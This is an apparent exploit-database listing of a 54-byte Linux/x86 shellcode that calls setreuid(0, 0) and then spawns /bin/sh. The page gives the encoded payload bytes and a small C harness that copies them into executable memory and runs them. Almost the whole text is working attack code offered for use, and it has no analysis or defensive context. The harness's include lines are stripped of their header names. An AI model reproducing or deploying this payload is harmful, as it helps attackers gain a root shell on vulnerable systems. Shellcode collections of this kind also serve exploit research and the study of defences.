Linux/x86 setreuid(0, 0) and then execve("/bin/sh", [ "/bin/sh", NULL ], NULL) shellcode 54 byte



EKU-ID: 5645 CVE: OSVDB-ID:
Author: tesla_ Published: 2016-06-27 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#include
#include
#include
#include
#include
  
/*
 * Linux/x86: 54 bytes setreuid(0, 0) and then execve("/bin/sh", [ "/bin/sh", NULL ], NULL) shellcode
 *
 * tesla_ (gandung@ppp.cylab.cmu.edu)
 */
unsigned char *shellcode = "\x31\xdb\x31\xc0\x53\x8b\x0c\x24\x8b\x1c\x24\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x50\x50"
                           "\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8b\x54\x24\x0c\x8b\x4c\x24\x08\x8d\x1c\x24"
                           "\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80";
  
int main(void) {
        void (*payload)(size_t a, size_t b, size_t c)__attribute__((regparm(3)));
  
        payload = mmap(NULL, sysconf(_SC_PAGESIZE), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
  
        memcpy(payload, shellcode, strlen(shellcode));
  
        __asm__ __volatile__("call      *%%eax"
                             :
                             : "r"(payload));
  
        return (0);
}